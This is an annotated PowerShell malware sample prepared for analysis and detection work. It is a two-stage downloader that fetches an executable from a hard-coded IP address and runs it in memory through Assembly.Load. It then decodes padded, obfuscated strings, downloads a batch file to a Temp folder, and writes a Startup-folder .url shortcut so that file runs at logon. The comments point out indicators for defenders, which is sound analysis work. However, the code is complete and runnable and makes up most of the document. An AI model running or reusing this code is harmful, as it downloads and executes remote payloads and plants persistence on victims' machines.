# Two-stage PowerShell downloader, annotated for analysis and detection work.
# The listing arrived collapsed onto two physical lines; line breaks are restored
# here (the here-string near the end cannot parse without them). No code token
# has been changed.
#
# Stage 1: fetch http://92.255.85.207/ret.exe into memory and run it as a .NET
#          assembly; this script never writes that payload to disk.
# Stage 2: save http://92.255.85.207/module.bat as C:\Windows\Temp\cmd.bat and
#          write a .url shortcut into the current user's Startup folder that
#          points at it (logon persistence).
#
# Both URLs use plain HTTP to a bare IP address, so the requests and response
# bodies are visible to proxy and network-sensor logging.

# Returns a new System.Net.WebClient; used only by Download-Assembly.
function Get-WebClient {
    return New-Object System.Net.WebClient
}

# Returns the hard-coded stage-1 URL. Unlike the stage-2 strings below, this
# one is not obfuscated, so the host appears literally in the script text.
function Get-DownloadUrl {
    $url = "http://92.255.85.207/ret.exe"
    return $url
}

# Downloads $url and returns the response body as a byte array.
# DownloadData keeps the content in memory; no file is created by this step.
function Download-Assembly {
    param (
        [string]$url
    )
    $client = Get-WebClient
    return $client.DownloadData($url)
}

# Loads a .NET assembly directly from the byte array via Assembly.Load(byte[]).
# Because the image never exists as a file here, file-based scanning of this
# stage has nothing to inspect; runtime telemetry is the place to look.
function Load-Assembly {
    param (
        [byte[]]$data
    )
    return [System.Reflection.Assembly]::Load($data)
}

# Invokes the assembly's entry point inside the current PowerShell process.
# $null is passed as the target object and an empty array as the argument list.
# NOTE(review): the empty argument list suggests the payload's entry point takes
# no parameters - not confirmable from this listing.
function Execute-EntryPoint {
    param (
        [System.Reflection.Assembly]$assembly
    )
    $entryPoint = $assembly.EntryPoint
    $entryPoint.Invoke($null, @())
}

# --- Stage 1 driver: URL -> bytes -> in-memory assembly -> run entry point ---
$url = Get-DownloadUrl
$downloadedData = Download-Assembly -url $url
$assembly = Load-Assembly -data $downloadedData
Execute-EntryPoint -assembly $assembly

# --- Stage 2: string obfuscation by junk-token padding ---
# Each literal is padded with a filler token that .replace() strips at runtime.
# Stripping 'FRC' leaves: http://92.255.85.207/module.bat
$rnVNFpDvyIkLjFyOq2hpKJ5Ylqm3pR = "FRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRChttp://92.255.85.207/module.batFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRC".replace('FRC','')

# Stripping the 30-character filler token leaves: C:\Windows\Temp\cmd.bat
# The same token also appears inside two of the variable names below, so the
# literal token is a stable string in this sample's script text.
$H2OjByV12QssDkOjuEB2vCsMFBpOeygH65hdPTt69MRcft6r9lQnufSr6Co = "MFBpOeygH65hdPTt69MRcft6r9lQnuCMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnu:MFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnuWMFBpOeygH65hdPTt69MRcft6r9lQnuiMFBpOeygH65hdPTt69MRcft6r9lQnunMFBpOeygH65hdPTt69MRcft6r9lQnudMFBpOeygH65hdPTt69MRcft6r9lQnuoMFBpOeygH65hdPTt69MRcft6r9lQnuwsMFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnuTeMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnumpMFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnucmMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnudMFBpOeygH65hdPTt69MRcft6r9lQnu.MFBpOeygH65hdPTt69MRcft6r9lQnubMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnuatMFBpOeygH65hdPTt69MRcft6r9lQnu".replace('MFBpOeygH65hdPTt69MRcft6r9lQnu','')

# Stripping the same token leaves:
#   $env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url
# i.e. a file in the per-user Startup folder, which Windows processes at logon.
$cJfQas6ada2z9B6rfUkb6SCxvfJYdT = "$env:APPDATA\MiMFBpOeygH65hdPTt69MRcft6r9lQnucrMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnuosofMFBpOeygH65hdPTt69MRcft6r9lQnut\WiMFBpOeygH65hdPTt69MRcft6r9lQnundMFBpOeygH65hdPTt69MRcft6r9lQnuowMFBpOeygH65hdPTt69MRcft6r9lQnusMFBpOeygH65hdPTt69MRcft6r9lQnu\StMFBpOeygH65hdPTt69MRcft6r9lQnuartMFBpOeygH65hdPTt69MRcft6r9lQnu MeMFBpOeygH65hdPTt69MRcft6r9lQnunuMFBpOeygH65hdPTt69MRcft6r9lQnu\PrMFBpOeygH65hdPTt69MRcft6r9lQnuogMFBpOeygH65hdPTt69MRcft6r9lQnuraMFBpOeygH65hdPTt69MRcft6r9lQnumsMFBpOeygH65hdPTt69MRcft6r9lQnu\StMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnuarMFBpOeygH65hdPTt69MRcft6r9lQnutMFBpOeygH65hdPTt69MRcft6r9lQnuupMFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnuDMFBpOeygH65hdPTt69MRcft6r9lQnueleMFBpOeygH65hdPTt69MRcft6r9lQnuteMFBpOeygH65hdPTt69MRcft6r9lQnuAppMFBpOeygH65hdPTt69MRcft6r9lQnu.url".replace('MFBpOeygH65hdPTt69MRcft6r9lQnu','')

# Second download: unlike stage 1, this one writes the response to disk at the
# decoded C:\Windows\Temp\cmd.bat path, leaving a file artifact to collect.
Invoke-WebRequest -Uri $rnVNFpDvyIkLjFyOq2hpKJ5Ylqm3pR -OutFile $H2OjByV12QssDkOjuEB2vCsMFBpOeygH65hdPTt69MRcft6r9lQnufSr6Co

# Body of the Internet Shortcut file; the variable expands to the batch path,
# giving URL=file:///C:\Windows\Temp\cmd.bat.
# NOTE(review): .replace('B','') is case-sensitive and none of the visible
# values contains an uppercase 'B', so it looks like a no-op here - confirm.
$gMFBpOeygH65hdPTt69MRcft6r9lQnuyONTnWkwmuAA96C12XMHWBsuhRv4 = @"
[InternetShortcut]
URL=file:///$H2OjByV12QssDkOjuEB2vCsMFBpOeygH65hdPTt69MRcft6r9lQnufSr6Co
"@.replace('B','')

# Persistence artifact: writes the shortcut as ASCII into the Startup folder.
# A .url file there whose target is a file:/// path under a Temp directory is
# the concrete on-disk indicator this script leaves behind.
Set-Content -Path $cJfQas6ada2z9B6rfUkb6SCxvfJYdT -Value $gMFBpOeygH65hdPTt69MRcft6r9lQnuyONTnWkwmuAA96C12XMHWBsuhRv4 -Encoding ASCII